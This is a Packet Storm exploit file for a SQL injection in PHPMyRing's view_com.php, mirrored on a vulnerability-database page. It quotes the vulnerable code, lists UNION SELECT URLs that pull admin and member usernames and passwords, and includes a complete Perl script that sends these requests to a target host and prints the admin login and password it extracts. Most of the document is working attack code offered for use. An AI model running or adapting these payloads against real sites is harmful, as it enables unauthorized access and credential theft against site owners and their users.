Lucene search
K

phpmyring.txt

🗓️ 27 Aug 2006 00:00:00Reported by Simo64Type 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 29 Views

PHPMyRing's (view_com.php) Remote SQL injection vulnerability and Exploi

Code
`#######################################################################  
#   
# PHPMyRing's (view_com.php) Remote SQL injection Exploit  
#   
# vulnerable code on view_com.php line ( 14 - 24)  
#   
# [code]  
# -----------------------------------------------------------------------------------  
# if (!$idsite)  
# {  
# echo "<p align=\"center\">"._("Erreur! Le n&deg; du site n'est pas d&eacute;fini!")."</p>";  
# }  
# else  
# {  
# // On va aller chercher le nom du site conserné, ça sera fait ;)  
# // Connexion MySQL  
# $conn=connecte();  
# $row=mysql_fetch_array(requete("SELECT site_nom FROM webring WHERE idsite=$idsite")); # <== SQL injection  
# $site_nom=$row['site_nom'];  
#   
# ...............  
#   
# <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">  
# <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="<? echo _("fr"); ?>">  
# <head>  
# <title><? echo _("Commentaires du site"). " ".$site_nom; ?></title>   
# ---------------------------------------------------------------------------------[/code]  
#   
# $idsite is not proprelly verified and can be used to inject sql some query  
#   
#===========  
# Exploit :  
#===========  
#   
# http://localhost/webring/view_com.php?idsite=[SQL]  
#   
#===========  
# Exemples :   
#===========  
#   
# [+] the first PoC URL will display admin username in page title and the second admin password  
#   
# http://localhost/webring/view_com.php?idsite=-1%20UNION%20SELECT%20loginadm%20FROM%20webring_adm  
#   
# http://localhost/webring/view_com.php?idsite=-1%20UNION%20SELECT%20passadm%20FROM%20webring_adm  
#   
#   
# [+] this will display members username (1) and password(2) in page title  
#   
# 1) http://localhost/webring/view_com.php?idsite=-1%20UNION%20SELECT%20pseudo%20FROM%20webring%20WHERE%20idsite=[victimesiteid]  
#   
# 2) http://localhost/webring/view_com.php?idsite=-1%20UNION%20SELECT%20mdp%20FROM%20webring%20WHERE%20idsite=[victimesiteid]  
#   
# Exploit to extract both admin login and plain text password:  
#  
# C:\>perl ring.pl 127.0.0.1 webring  
# #################################################  
# # PHPMyRing's Remote SQL injection Exploit #  
# # Discovered by simo64_at_morx_org #  
# # Script writting by simo_at_morx_org #  
# # MorX Security Research Team #  
# # www.morx.org #  
# #################################################  
  
# [*] Trying to get the admin login ...  
  
# [+] your admin login is --> admin  
  
# [+] your admin pass is --> 123456  
  
use IO::Socket;  
  
if(!defined($ARGV[0] && $ARGV[1])) {  
  
system (clear);  
print "\n";  
print "#################################################\n";  
print "# PHPMyRing's Remote SQL injection Exploit #\n";  
print "# Discovered by simo64_at_morx_org #\n";  
print "# Script writting by simo_at_morx_org #\n";  
print "# MorX Security Research Team #\n";  
print "# www.morx.org #\n";  
print "#################################################\n\n";  
  
print "--- Usage: perl $0 <host> <folder>\n";  
print "--- Example: perl $0 127.0.0.1 afd_webring\n\n";  
exit; }  
  
$TARGET = $ARGV[0];  
  
$FOLDER = $ARGV[1];  
  
$PORT = "80";  
  
$SCRIPT = "/view_com.php?idsite=";  
  
$SQLPASS = "-1%20UNION%20SELECT%20passadm%20FROM%20webring_adm";  
  
$SQLADMIN = "-1%20UNION%20SELECT%20loginadm%20FROM%20webring_adm";  
  
################################################################################  
  
$COMMAND1 = "GET /$FOLDER$SCRIPT$SQLADMIN HTTP/1.1";  
$COMMAND2 = "Host: $TARGET";  
$COMMAND3 = "Connection: Close";  
$COMMAND4 = "GET /$FOLDER$SCRIPT$SQLPASS HTTP/1.1";  
  
$remote = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$TARGET",PeerPort=>"$PORT")  
|| die "Can't connect to $TARGET";  
  
print "#################################################\n";  
print "# PHPMyRing's Remote SQL injection Exploit #\n";  
print "# Discovered by simo64_at_morx_org #\n";  
print "# Script writting by simo_at_morx_org #\n";  
print "# MorX Security Research Team #\n";  
print "# www.morx.org #\n";  
print "#################################################\n\n";  
  
sleep 2;  
  
print "[*] Trying to get the admin login ...\n\n";  
  
print $remote "$COMMAND1\n$COMMAND2\n$COMMAND3\n\n";  
  
while ($result = <$remote> ) {  
  
if ($result =~ /site (.*?)</ ) {  
$adminlogin = $1;  
print "[+] your admin login is --> $adminlogin\n\n";  
$a = 1;  
}  
}  
  
if ($a == 0)   
{   
print "[-] Failed, cant get the admin login\n\n";  
print "[*] Trying to get the admin password ...\n\n";  
}  
  
$remote = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$TARGET",PeerPort=>"$PORT")  
|| die "Can't connect to $TARGET";  
  
print $remote "$COMMAND4\n$COMMAND2\n$COMMAND3\n\n";  
  
while ($result2 = <$remote> ) {  
  
if ($result2 =~ /site (.*?)</ ) {  
$adminpass = $1;  
print "[+] your admin pass is --> $adminpass\n\n";  
$b = 1;  
}  
}  
  
if ($b == 0)  
{ print "[-] Failed, cant get the admin password\n";  
}  
  
$remote->flush();  
close($remote);  
exit;  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

27 Aug 2006 00:00Current
7.4High risk
Vulners AI Score7.4
29